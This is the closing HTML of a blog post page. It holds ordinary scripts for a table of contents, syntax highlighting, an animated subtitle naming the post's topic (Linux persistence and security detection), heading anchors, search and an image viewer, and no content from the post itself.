            'position': 'fixed',
            'top': tocT,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
    });
  </script>







  <script defer src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




<!-- Plugins -->



  <script  src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "linux持久化及安全检测&nbsp;",
      ],
      cursorChar: "🐶",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
